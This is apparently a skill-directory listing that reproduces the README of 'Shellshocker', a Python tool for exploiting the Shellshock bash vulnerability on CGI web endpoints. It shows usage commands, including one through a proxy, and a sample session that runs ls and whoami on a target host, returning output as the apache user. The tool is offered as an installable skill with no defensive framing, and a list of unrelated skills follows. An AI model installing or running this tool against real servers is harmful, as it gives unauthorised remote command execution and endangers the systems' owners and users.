Shellshocker

Shellshock easily exploitation

Generate Convert Improve

Install / Use

/learn @AlmCo/Shellshocker

About this skill

Quality Score

0/100

README

Shellshocker

Shellshock easily exploitation

When you find Shellshock / Bashbug vulnerability and want the easiest way to exploit it, you can use Shellshocker. Shellshocker suggests to avoid user-agent spoofing on-hand. In contrast to that it has a nice shell-interface.

Usage:

Run the script with python: "python shellshocker.py http://exam.com/cgi-bin/cat"
Using proxy: "python shellshocker.py http://exam.com/cgi-bin/cat 192.168.1.5:3128"

Examples:

/.../shellshoker$ python shellshoker.py http://10.0.0.12:591/cgi-bin/cat
shellshock/command$ ls -lath /home

total 16K
dr-xr-xr-x. 22 root    root    4.0K Feb  9 21:14 ..
drwxrwxrwx.  2 tyrone  tyrone  4.0K Jan 27  2015 tyrone
drwx------   2 reguser reguser 4.0K Jan  2  2015 reguser
drwxr-xr-x.  4 root    root    4.0K Dec 30  2014 .

shellshock/command$ whoami

apache

shellshock/command$ ^C
Aborted / Invulnerable

Related Skills

node-connect

353.1k

Diagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps

frontend-design

111.6k

Create distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.

openai-whisper-api

353.1k

Transcribe audio via OpenAI Audio Transcriptions API (Whisper).

qqbot-media

353.1k

QQBot 富媒体收发能力。使用 <qqmedia> 标签，系统根据文件扩展名自动识别类型（图片/语音/视频/文件）。